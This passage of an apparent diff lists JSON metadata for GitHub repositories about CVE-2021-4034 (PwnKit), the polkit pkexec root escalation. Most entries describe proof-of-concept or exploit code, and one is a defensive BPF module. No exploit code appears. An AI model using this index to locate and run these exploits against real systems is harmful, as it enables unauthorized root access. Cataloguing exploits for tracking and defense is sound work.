+ "owner": {
+ "login": "xcanwin",
+ "id": 14187349,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14187349?v=4",
+ "html_url": "https:\/\/github.com\/xcanwin"
+ },
+ "html_url": "https:\/\/github.com\/xcanwin\/CVE-2021-4034-UniontechOS",
+ "description": "统信UOS 桌面操作系统,存在CVE-2021-4034漏洞(Linux Polkit本地权限提升漏洞)。",
+ "fork": false,
+ "created_at": "2022-01-26T15:07:07Z",
+ "updated_at": "2023-04-03T08:43:06Z",
+ "pushed_at": "2022-05-27T18:41:40Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-4034",
+ "polkit",
+ "uniontechos",
+ "uos"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 452339779,
+ "name": "CVE-2021-4034",
+ "full_name": "azminawwar\/CVE-2021-4034",
+ "owner": {
+ "login": "azminawwar",
+ "id": 9054660,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9054660?v=4",
+ "html_url": "https:\/\/github.com\/azminawwar"
+ },
+ "html_url": "https:\/\/github.com\/azminawwar\/CVE-2021-4034",
+ "description": "CVE-2021-4034 in Bash Script",
+ "fork": false,
+ "created_at": "2022-01-26T15:56:15Z",
+ "updated_at": "2022-03-23T23:09:12Z",
+ "pushed_at": "2022-01-26T16:09:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452343009,
+ "name": "pwnkit-exploit",
+ "full_name": "PeterGottesman\/pwnkit-exploit",
+ "owner": {
+ "login": "PeterGottesman",
+ "id": 9545411,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9545411?v=4",
+ "html_url": "https:\/\/github.com\/PeterGottesman"
+ },
+ "html_url": "https:\/\/github.com\/PeterGottesman\/pwnkit-exploit",
+ "description": "CVE-2021-4034 POC exploit",
+ "fork": false,
+ "created_at": "2022-01-26T16:04:37Z",
+ "updated_at": "2023-08-04T21:24:15Z",
+ "pushed_at": "2022-01-28T00:38:03Z",
+ "stargazers_count": 32,
+ "watchers_count": 32,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 32,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452343489,
+ "name": "CVE-2021-4034",
+ "full_name": "sunny0day\/CVE-2021-4034",
+ "owner": {
+ "login": "sunny0day",
+ "id": 47361206,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47361206?v=4",
+ "html_url": "https:\/\/github.com\/sunny0day"
+ },
+ "html_url": "https:\/\/github.com\/sunny0day\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T16:05:47Z",
+ "updated_at": "2022-01-26T16:06:47Z",
+ "pushed_at": "2022-01-26T16:08:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452345701,
+ "name": "cve-2021-4034",
+ "full_name": "artemis-mike\/cve-2021-4034",
+ "owner": {
+ "login": "artemis-mike",
+ "id": 61116444,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61116444?v=4",
+ "html_url": "https:\/\/github.com\/artemis-mike"
+ },
+ "html_url": "https:\/\/github.com\/artemis-mike\/cve-2021-4034",
+ "description": "PoC for cve-2021-4034",
+ "fork": false,
+ "created_at": "2022-01-26T16:11:40Z",
+ "updated_at": "2024-04-27T19:02:22Z",
+ "pushed_at": "2024-04-27T19:02:19Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 452348088,
+ "name": "CVE-2021-4034",
+ "full_name": "whokilleddb\/CVE-2021-4034",
+ "owner": {
+ "login": "whokilleddb",
+ "id": 56482137,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56482137?v=4",
+ "html_url": "https:\/\/github.com\/whokilleddb"
+ },
+ "html_url": "https:\/\/github.com\/whokilleddb\/CVE-2021-4034",
+ "description": "An exploit for CVE-2021-4034 aka Pwnkit: Local Privilege Escalation in polkit's pkexec",
+ "fork": false,
+ "created_at": "2022-01-26T16:18:10Z",
+ "updated_at": "2022-06-30T06:04:37Z",
+ "pushed_at": "2022-01-27T19:58:45Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452357365,
+ "name": "CVE-2021-4034",
+ "full_name": "dadvlingd\/CVE-2021-4034",
+ "owner": {
+ "login": "dadvlingd",
+ "id": 61039959,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61039959?v=4",
+ "html_url": "https:\/\/github.com\/dadvlingd"
+ },
+ "html_url": "https:\/\/github.com\/dadvlingd\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T16:43:18Z",
+ "updated_at": "2023-12-24T12:16:37Z",
+ "pushed_at": "2023-02-19T13:01:42Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452365926,
+ "name": "cve-2021-4034",
+ "full_name": "zcrosman\/cve-2021-4034",
+ "owner": {
+ "login": "zcrosman",
+ "id": 21688962,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21688962?v=4",
+ "html_url": "https:\/\/github.com\/zcrosman"
+ },
+ "html_url": "https:\/\/github.com\/zcrosman\/cve-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T17:07:26Z",
+ "updated_at": "2022-01-26T17:08:27Z",
+ "pushed_at": "2022-01-26T17:13:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452380197,
+ "name": "CVE-2021-4034",
+ "full_name": "robemmerson\/CVE-2021-4034",
+ "owner": {
+ "login": "robemmerson",
+ "id": 5360258,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5360258?v=4",
+ "html_url": "https:\/\/github.com\/robemmerson"
+ },
+ "html_url": "https:\/\/github.com\/robemmerson\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T17:49:58Z",
+ "updated_at": "2022-01-26T17:50:58Z",
+ "pushed_at": "2022-01-26T23:44:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452381294,
+ "name": "CVE-2021-4034",
+ "full_name": "joeammond\/CVE-2021-4034",
+ "owner": {
+ "login": "joeammond",
+ "id": 12400203,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12400203?v=4",
+ "html_url": "https:\/\/github.com\/joeammond"
+ },
+ "html_url": "https:\/\/github.com\/joeammond\/CVE-2021-4034",
+ "description": "Python exploit code for CVE-2021-4034 (pwnkit)",
+ "fork": false,
+ "created_at": "2022-01-26T17:53:16Z",
+ "updated_at": "2024-06-18T11:27:02Z",
+ "pushed_at": "2022-01-28T00:29:15Z",
+ "stargazers_count": 144,
+ "watchers_count": 144,
+ "has_discussions": false,
+ "forks_count": 37,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 37,
+ "watchers": 144,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452384014,
+ "name": "PwnKit-Exploit",
+ "full_name": "luijait\/PwnKit-Exploit",
+ "owner": {
+ "login": "luijait",
+ "id": 60628803,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60628803?v=4",
+ "html_url": "https:\/\/github.com\/luijait"
+ },
+ "html_url": "https:\/\/github.com\/luijait\/PwnKit-Exploit",
+ "description": "Proof of Concept (PoC) CVE-2021-4034 ",
+ "fork": false,
+ "created_at": "2022-01-26T18:01:26Z",
+ "updated_at": "2024-06-10T11:17:38Z",
+ "pushed_at": "2022-02-07T15:42:00Z",
+ "stargazers_count": 89,
+ "watchers_count": 89,
+ "has_discussions": false,
+ "forks_count": 15,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "base64",
+ "c",
+ "cve",
+ "cve-2021-4034",
+ "exploit",
+ "hacking",
+ "linux",
+ "offensive-security",
+ "offsec",
+ "pentesting",
+ "poc",
+ "polkit",
+ "proof-of-concept",
+ "pwnkit",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 15,
+ "watchers": 89,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 452400857,
+ "name": "CVE-2021-4034",
+ "full_name": "Anonymous-Family\/CVE-2021-4034",
+ "owner": {
+ "login": "Anonymous-Family",
+ "id": 98486038,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98486038?v=4",
+ "html_url": "https:\/\/github.com\/Anonymous-Family"
+ },
+ "html_url": "https:\/\/github.com\/Anonymous-Family\/CVE-2021-4034",
+ "description": "Linux system service bug gives root on all major distros, exploit published A vulnerability in the pkexec component of Polkit identified as CVE-2021-4034 PwnKit is present in the default configuration of all major Linux distributions and can be exploited to gain privileges over the compj researchers.",
+ "fork": false,
+ "created_at": "2022-01-26T18:53:47Z",
+ "updated_at": "2022-01-26T23:40:24Z",
+ "pushed_at": "2022-01-26T19:31:04Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 452404386,
+ "name": "CVE-2021-4034",
+ "full_name": "phvilasboas\/CVE-2021-4034",
+ "owner": {
+ "login": "phvilasboas",
+ "id": 40247368,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40247368?v=4",
+ "html_url": "https:\/\/github.com\/phvilasboas"
+ },
+ "html_url": "https:\/\/github.com\/phvilasboas\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T19:04:55Z",
+ "updated_at": "2022-01-26T19:10:05Z",
+ "pushed_at": "2022-01-26T19:10:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452414357,
+ "name": "CVE-2021-4034",
+ "full_name": "hackingyseguridad\/CVE-2021-4034",
+ "owner": {
+ "login": "hackingyseguridad",
+ "id": 20928501,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20928501?v=4",
+ "html_url": "https:\/\/github.com\/hackingyseguridad"
+ },
+ "html_url": "https:\/\/github.com\/hackingyseguridad\/CVE-2021-4034",
+ "description": "CVE-2021-4034, exploit para escalado de privilegios en SO Linux a root",
+ "fork": false,
+ "created_at": "2022-01-26T19:36:38Z",
+ "updated_at": "2022-11-17T23:01:21Z",
+ "pushed_at": "2022-01-27T19:04:14Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "elevar",
+ "exploit",
+ "linux",
+ "privilegios",
+ "root",
+ "vuln"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452417265,
+ "name": "CVE-2021-4034",
+ "full_name": "vilasboasph\/CVE-2021-4034",
+ "owner": {
+ "login": "vilasboasph",
+ "id": 98488838,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98488838?v=4",
+ "html_url": "https:\/\/github.com\/vilasboasph"
+ },
+ "html_url": "https:\/\/github.com\/vilasboasph\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T19:46:19Z",
+ "updated_at": "2022-01-28T15:56:36Z",
+ "pushed_at": "2022-01-26T19:46:54Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452430809,
+ "name": "CVE-2021-4034",
+ "full_name": "nobelh\/CVE-2021-4034",
+ "owner": {
+ "login": "nobelh",
+ "id": 42378484,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42378484?v=4",
+ "html_url": "https:\/\/github.com\/nobelh"
+ },
+ "html_url": "https:\/\/github.com\/nobelh\/CVE-2021-4034",
+ "description": "Polkit pkexec CVE-2021-4034 Proof Of Concept and Patching",
+ "fork": false,
+ "created_at": "2022-01-26T20:32:10Z",
+ "updated_at": "2022-02-08T20:59:44Z",
+ "pushed_at": "2022-03-03T21:20:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452436770,
+ "name": "pkexec-lpe-poc",
+ "full_name": "callrbx\/pkexec-lpe-poc",
+ "owner": {
+ "login": "callrbx",
+ "id": 9372418,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9372418?v=4",
+ "html_url": "https:\/\/github.com\/callrbx"
+ },
+ "html_url": "https:\/\/github.com\/callrbx\/pkexec-lpe-poc",
+ "description": "POC for CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-01-26T20:52:32Z",
+ "updated_at": "2023-02-22T18:17:44Z",
+ "pushed_at": "2022-01-28T16:58:49Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452478414,
+ "name": "CVE-2021-4034",
+ "full_name": "ch4rum\/CVE-2021-4034",
+ "owner": {
+ "login": "ch4rum",
+ "id": 98498025,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98498025?v=4",
+ "html_url": "https:\/\/github.com\/ch4rum"
+ },
+ "html_url": "https:\/\/github.com\/ch4rum\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T23:46:28Z",
+ "updated_at": "2022-01-27T05:23:59Z",
+ "pushed_at": "2022-01-27T02:12:19Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452496340,
+ "name": "CVE-2021-4034",
+ "full_name": "cd80-ctf\/CVE-2021-4034",
+ "owner": {
+ "login": "cd80-ctf",
+ "id": 86139991,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86139991?v=4",
+ "html_url": "https:\/\/github.com\/cd80-ctf"
+ },
+ "html_url": "https:\/\/github.com\/cd80-ctf\/CVE-2021-4034",
+ "description": "A simple proof-of-concept for CVE-2021-4034 (pkexec local privilege escalation)",
+ "fork": false,
+ "created_at": "2022-01-27T01:14:11Z",
+ "updated_at": "2022-07-29T11:05:21Z",
+ "pushed_at": "2022-01-27T01:23:02Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452512326,
+ "name": "CVE-2021-4034",
+ "full_name": "Al1ex\/CVE-2021-4034",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-4034",
+ "description": "Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)",
+ "fork": false,
+ "created_at": "2022-01-27T02:27:15Z",
+ "updated_at": "2022-07-26T12:45:30Z",
+ "pushed_at": "2022-01-27T02:27:41Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-4034",
+ "pkexec"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452585484,
+ "name": "CVE-2021-4034",
+ "full_name": "ashutoshrohilla\/CVE-2021-4034",
+ "owner": {
+ "login": "ashutoshrohilla",
+ "id": 37948751,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37948751?v=4",
+ "html_url": "https:\/\/github.com\/ashutoshrohilla"
+ },
+ "html_url": "https:\/\/github.com\/ashutoshrohilla\/CVE-2021-4034",
+ "description": "This repository contains the exploit for vulnerability CVE-2021-4034 .",
+ "fork": false,
+ "created_at": "2022-01-27T07:39:51Z",
+ "updated_at": "2022-04-24T16:54:23Z",
+ "pushed_at": "2022-01-27T07:46:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452595993,
+ "name": "CVE-2021-4034",
+ "full_name": "nikip72\/CVE-2021-4034",
+ "owner": {
+ "login": "nikip72",
+ "id": 49496243,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49496243?v=4",
+ "html_url": "https:\/\/github.com\/nikip72"
+ },
+ "html_url": "https:\/\/github.com\/nikip72\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-27T08:14:55Z",
+ "updated_at": "2022-01-27T08:19:51Z",
+ "pushed_at": "2022-01-27T08:21:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452600117,
+ "name": "CVE-2021-4034",
+ "full_name": "NiS3x\/CVE-2021-4034",
+ "owner": {
+ "login": "NiS3x",
+ "id": 93822668,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93822668?v=4",
+ "html_url": "https:\/\/github.com\/NiS3x"
+ },
+ "html_url": "https:\/\/github.com\/NiS3x\/CVE-2021-4034",
+ "description": "PoC CVE 2021-4034 PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec",
+ "fork": false,
+ "created_at": "2022-01-27T08:28:56Z",
+ "updated_at": "2023-09-28T11:35:25Z",
+ "pushed_at": "2022-01-27T08:40:56Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452620702,
+ "name": "CVE-2021-4034",
+ "full_name": "thatstraw\/CVE-2021-4034",
+ "owner": {
+ "login": "thatstraw",
+ "id": 61482810,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61482810?v=4",
+ "html_url": "https:\/\/github.com\/thatstraw"
+ },
+ "html_url": "https:\/\/github.com\/thatstraw\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-27T09:35:54Z",
+ "updated_at": "2022-03-01T17:04:44Z",
+ "pushed_at": "2022-01-27T10:27:15Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452622549,
+ "name": "CVE-2021-4034",
+ "full_name": "luckythandel\/CVE-2021-4034",
+ "owner": {
+ "login": "luckythandel",
+ "id": 27768247,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27768247?v=4",
+ "html_url": "https:\/\/github.com\/luckythandel"
+ },
+ "html_url": "https:\/\/github.com\/luckythandel\/CVE-2021-4034",
+ "description": "This is a POC for the vulnerability found in polkit's pkexec binary which is used to run programs as another users.",
+ "fork": false,
+ "created_at": "2022-01-27T09:42:18Z",
+ "updated_at": "2022-01-27T09:51:38Z",
+ "pushed_at": "2022-01-27T09:49:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-4034",
+ "local-privilege-escalation",
+ "pkexec",
+ "polkit",
+ "polkit-agent",
+ "polkit-exploit"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452629706,
+ "name": "CVE-2021-4034",
+ "full_name": "Plethore\/CVE-2021-4034",
+ "owner": {
+ "login": "Plethore",
+ "id": 6282217,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6282217?v=4",
+ "html_url": "https:\/\/github.com\/Plethore"
+ },
+ "html_url": "https:\/\/github.com\/Plethore\/CVE-2021-4034",
+ "description": "Python exploit for CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-01-27T10:05:09Z",
+ "updated_at": "2022-01-27T10:22:23Z",
+ "pushed_at": "2022-01-27T10:27:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452636288,
+ "name": "lsm_bpf_check_argc0",
+ "full_name": "evdenis\/lsm_bpf_check_argc0",
+ "owner": {
+ "login": "evdenis",
+ "id": 150761,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150761?v=4",
+ "html_url": "https:\/\/github.com\/evdenis"
+ },
+ "html_url": "https:\/\/github.com\/evdenis\/lsm_bpf_check_argc0",
+ "description": "LSM BPF module to block pwnkit (CVE-2021-4034) like exploits",
+ "fork": false,
+ "created_at": "2022-01-27T10:26:46Z",
+ "updated_at": "2023-09-06T15:56:21Z",
+ "pushed_at": "2022-02-17T16:46:44Z",
+ "stargazers_count": 20,
+ "watchers_count": 20,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bpf",
+ "cve-2021-4034",
+ "lsm",
+ "pwnkit"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 20,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452715280,
+ "name": "poppy",
+ "full_name": "tahaafarooq\/poppy",
+ "owner": {
+ "login": "tahaafarooq",
+ "id": 49201347,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49201347?v=4",
+ "html_url": "https:\/\/github.com\/tahaafarooq"
+ },
+ "html_url": "https:\/\/github.com\/tahaafarooq\/poppy",
+ "description": "CVE-2021-4034 PoC , polkit < 0.131",
+ "fork": false,
+ "created_at": "2022-01-27T14:29:55Z",
+ "updated_at": "2023-09-28T11:35:25Z",
+ "pushed_at": "2022-12-20T09:03:26Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-4034",
+ "exploit-development",
+ "proof-of-concept",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452719291,
+ "name": "pkwned",
+ "full_name": "DosAmp\/pkwned",
+ "owner": {
+ "login": "DosAmp",
+ "id": 592891,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/592891?v=4",
+ "html_url": "https:\/\/github.com\/DosAmp"
+ },
+ "html_url": "https:\/\/github.com\/DosAmp\/pkwned",
+ "description": "Proof of Concept for CVE-2021-4034 (with experimental traceless exploitation)",
+ "fork": false,
+ "created_at": "2022-01-27T14:40:50Z",
+ "updated_at": "2022-01-29T14:55:49Z",
+ "pushed_at": "2022-01-29T14:48:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-4034",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452720408,
+ "name": "CVE-2021-4034",
+ "full_name": "PwnFunction\/CVE-2021-4034",
+ "owner": {
+ "login": "PwnFunction",
+ "id": 19750782,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19750782?v=4",
+ "html_url": "https:\/\/github.com\/PwnFunction"
+ },
+ "html_url": "https:\/\/github.com\/PwnFunction\/CVE-2021-4034",
+ "description": "Proof of concept for pwnkit vulnerability",
+ "fork": false,
+ "created_at": "2022-01-27T14:43:57Z",
+ "updated_at": "2024-05-10T10:44:07Z",
+ "pushed_at": "2023-01-12T19:23:29Z",
+ "stargazers_count": 335,
+ "watchers_count": 335,
+ "has_discussions": false,
+ "forks_count": 41,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 41,
+ "watchers": 335,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 452753346,
+ "name": "CVE-2021-4034",
+ "full_name": "locksec\/CVE-2021-4034",
+ "owner": {
+ "login": "locksec",
+ "id": 6196087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6196087?v=4",
+ "html_url": "https:\/\/github.com\/locksec"
+ },
+ "html_url": "https:\/\/github.com\/locksec\/CVE-2021-4034",
+ "description": "Exploit PoC for the polkit pkexec (PWNKIT) vulnerability",
+ "fork": false,
+ "created_at": "2022-01-27T16:15:21Z",
+ "updated_at": "2023-03-05T08:49:53Z",
+ "pushed_at": "2022-01-27T16:53:17Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452758223,
